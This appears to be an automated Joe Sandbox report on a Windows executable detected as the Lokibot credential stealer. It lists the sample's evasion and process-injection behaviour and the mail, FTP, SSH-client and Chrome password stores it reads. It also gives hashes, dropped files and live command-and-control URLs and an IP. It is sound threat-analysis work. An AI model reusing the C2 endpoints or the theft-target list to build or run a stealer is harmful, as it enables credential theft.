          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-3947
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe TID: 4216Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeAPI call chain: ExitProcess graph end nodegraph_0-3601
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeAPI call chain: ExitProcess graph end nodegraph_0-3599
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0402 mov eax, dword ptr fs:[00000030h]0_2_021B0402
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0616 mov eax, dword ptr fs:[00000030h]0_2_021B0616
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0706 mov eax, dword ptr fs:[00000030h]0_2_021B0706
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0744 mov eax, dword ptr fs:[00000030h]0_2_021B0744
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B06C7 mov eax, dword ptr fs:[00000030h]0_2_021B06C7
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeMemory written: C:\Users\user\Desktop\kVijllv0Yl.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe" Jump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405AA7
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069

          Stealing of Sensitive Information

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: PopPassword1_2_0040D069
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: SmtpPassword1_2_0040D069
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		2
          OS Credential Dumping          		1
          Account Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
          Process Injection          		2
          Obfuscated Files or Information          		2
          Credentials in Registry          		2
          File and Directory Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager5
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS11
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer112
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Virtualization/Sandbox Evasion          		LSA Secrets11
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials1
          System Owner/User Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          kVijllv0Yl.exe40%VirustotalBrowse
          kVijllv0Yl.exe48%ReversingLabsWin32.Backdoor.Androm
          kVijllv0Yl.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll28%VirustotalBrowse

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.kVijllv0Yl.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.kVijllv0Yl.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.kVijllv0Yl.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.kVijllv0Yl.exe.1ade0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.kVijllv0Yl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.kVijllv0Yl.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.kVijllv0Yl.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          secure01-redirect.net22%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
          http://alphastand.win/alien/fre.php0%URL Reputationsafe
          http://alphastand.trade/alien/fre.php0%URL Reputationsafe
          http://alphastand.top/alien/fre.php0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://secure01-redirect.net/gc15/fre.php19%VirustotalBrowse
          http://secure01-redirect.net/gc15/fre.php100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          secure01-redirect.net
          		185.185.69.76
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://kbfvzoboss.bid/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.win/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.trade/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.top/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://secure01-redirect.net/gc15/fre.phptrue
          • 19%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorkVijllv0Yl.exefalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorkVijllv0Yl.exefalse
              		high
              http://www.ibsensoftware.com/kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              185.185.69.76
              		secure01-redirect.netRussian Federation
              		35278SPRINTHOSTRUtrue

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:562515
              Start date:28.01.2022
              Start time:23:36:03
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 58s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:kVijllv0Yl (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:21
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@35/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 77.4% (good quality ratio 74.7%)
              • Quality average: 77.1%
              • Quality standard deviation: 28%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 66
              • Number of non-executed functions: 38
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              23:37:15API Interceptor32x Sleep call for process: kVijllv0Yl.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              185.185.69.76aaaaa.xlsGet hashmaliciousBrowse
              • secure01-redirect.net/gc15/fre.php

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              secure01-redirect.netaaaaa.xlsGet hashmaliciousBrowse
              • 185.185.69.76
              ZL4bQfmHmw.exeGet hashmaliciousBrowse
              • 185.232.170.170
              s1HE9zfjE9.exeGet hashmaliciousBrowse
              • 185.232.170.170
              SOA - ACCUFORM INC.xlsxGet hashmaliciousBrowse
              • 185.232.170.170
              IV2022-01022#U2026'BL#U00a0No.OOLU2688230220-419#U00a03058203-MTH2167597AK.xlsxGet hashmaliciousBrowse
              • 185.232.170.170
              EDX2qfzGPa.exeGet hashmaliciousBrowse
              • 185.232.170.170
              6HtTPS13jg.exeGet hashmaliciousBrowse
              • 185.232.170.170
              EKI1HjTLW2.exeGet hashmaliciousBrowse
              • 185.232.170.170
              SOA - ACCUFORM INC.xlsxGet hashmaliciousBrowse
              • 185.232.170.170
              Quotation 5200025017.xlsxGet hashmaliciousBrowse
              • 185.232.170.170
              WP21BZ059.xlsxGet hashmaliciousBrowse
              • 185.232.170.170
              PSRSG-BPL-221221-1 JOB G225.xlsxGet hashmaliciousBrowse
              • 185.232.170.170
              SC22-SPJAN-136 USD 578,169.49.xlsxGet hashmaliciousBrowse
              • 109.107.185.55
              SCS AI - EARLY PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
              • 109.107.185.55
              gfvtrnbFF6.exeGet hashmaliciousBrowse
              • 109.107.185.55
              dN8yYUIwjU.exeGet hashmaliciousBrowse
              • 109.107.185.55
              L4E41ul496.exeGet hashmaliciousBrowse
              • 109.107.185.55
              zyFThUiJ3v.exeGet hashmaliciousBrowse
              • 109.107.185.55
              RFQ.xlsxGet hashmaliciousBrowse
              • 109.107.185.55
              SCS AI - EARLY PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
              • 85.193.80.221

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              SPRINTHOSTRUaaaaa.xlsGet hashmaliciousBrowse
              • 185.185.69.76
              ciqgrkCTI2.exeGet hashmaliciousBrowse
              • 141.8.192.193
              e65ajzPmCQ.exeGet hashmaliciousBrowse
              • 141.8.192.193
              2M0oXgXqu4.exeGet hashmaliciousBrowse
              • 141.8.193.103
              WRZrNOZubz.exeGet hashmaliciousBrowse
              • 141.8.193.103
              QQhgg2sQI1.exeGet hashmaliciousBrowse
              • 141.8.194.74
              F1aX8n50SX.exeGet hashmaliciousBrowse
              • 141.8.194.203
              urMpgNNXPM.exeGet hashmaliciousBrowse
              • 141.8.194.74
              zmbGUZTICp.exeGet hashmaliciousBrowse
              • 141.8.194.74
              sT4cF8rUxp.exeGet hashmaliciousBrowse
              • 141.8.194.74
              Za35fCUFau.exeGet hashmaliciousBrowse
              • 141.8.194.74
              tijXCZsbGe.exeGet hashmaliciousBrowse
              • 141.8.194.74
              JBtjAS1TGq.exeGet hashmaliciousBrowse
              • 141.8.194.74
              eIxMVDoQF3.exeGet hashmaliciousBrowse
              • 141.8.194.74
              PPsa8TXVuy.exeGet hashmaliciousBrowse
              • 141.8.194.74
              JV4ILFxpDY.exeGet hashmaliciousBrowse
              • 141.8.194.74
              gLD9IA2G4A.exeGet hashmaliciousBrowse
              • 141.8.194.74
              U3E7zMaux2.exeGet hashmaliciousBrowse
              • 141.8.194.74
              0Cjy7Lkv1A.exeGet hashmaliciousBrowse
              • 141.8.194.74
              emPJndhuvA.exeGet hashmaliciousBrowse
              • 141.8.194.74

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dllaaaaa.xlsGet hashmaliciousBrowse

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\nsg69F3.tmp

                Download File
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):269906
                Entropy (8bit):7.658711659128666
                Encrypted:false
                SSDEEP:6144:uuOB0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUYtDw:tr1XaeS0xw5XNVGx0xjH
                MD5:3E44A21AFF425B74994D8A28FFF9B23E
                SHA1:1654662D1C4F390E994D4C858D8B820FE651605C
                SHA-256:8D848BF31B17F081AAFA0AA4535767365C8CC518A8A434776733A06DE10921C9
                SHA-512:AFD4358FCA881DE6C7587C407FC66014FD5A6EB1E3DB604CBBA7F53766141C2C0CC170A0D8B7C066169BC14EFA805A9725FE18A89B6C7A4967DE61E80D941E07
                Malicious:false
                Reputation:low
                Preview:Ld......,................... ....M......fc......4d..........................................................................................................................................................................................................................................J...................j...............................................................................................................................f.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll

                Download File
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):20992
                Entropy (8bit):5.749135787820481
                Encrypted:false
                SSDEEP:384:Yb6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbotKb:YbG1albrXY0HwinMdZeUhbogb
                MD5:C91E53F1A792E1F98CAE5FAF1B3324BD
                SHA1:4CD46871507173B3B4EAB34A2885E76E4D60E32A
                SHA-256:2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
                SHA-512:25AC355D4FB8DD503921B62AA5F869C5805F6909C7079633B5EB4BE9C6094B708D216786AA8D025712558745AEF13A7F3F9FEFA7D5C82BEA44957737E954176C
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 28%, Browse
                Joe Sandbox View:
                • Filename: aaaaa.xls, Detection: malicious, Browse
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L....g.a...........!.....@...................P............................................@.........................0Q..L...|Q.......`.......................p.......................................................P..0............................text...,>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\uyauscropq

                Download File
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):4967
                Entropy (8bit):6.171281725061639
                Encrypted:false
                SSDEEP:96:NPyed2g5U8YofB+TCC1CTHLBiA5CECh5+AU+P6dOuG3xiuoggvX3K:hyyzPfGVCTHLBiA5Ctf+AU+PI1GwuorK
                MD5:6A777038ED583DD539A48B85A672378F
                SHA1:2B24614BD0F041619CBEA3AC3DFCE400C0A7A30B
                SHA-256:D15DA5D9FC537DA388F115A3E951FC44CCD30BB62B0F9131EE1F1B42C8B70413
                SHA-512:48C0BB9A6873B022F561C77BA69C769BB9352CF02B476FFCBB63A14EC8F554FCDA792EFD7203650ABB2877D3E0D4CEF3FA1EF5D46BBD9A5C3ECE002F30257B6E
                Malicious:false
                Reputation:low
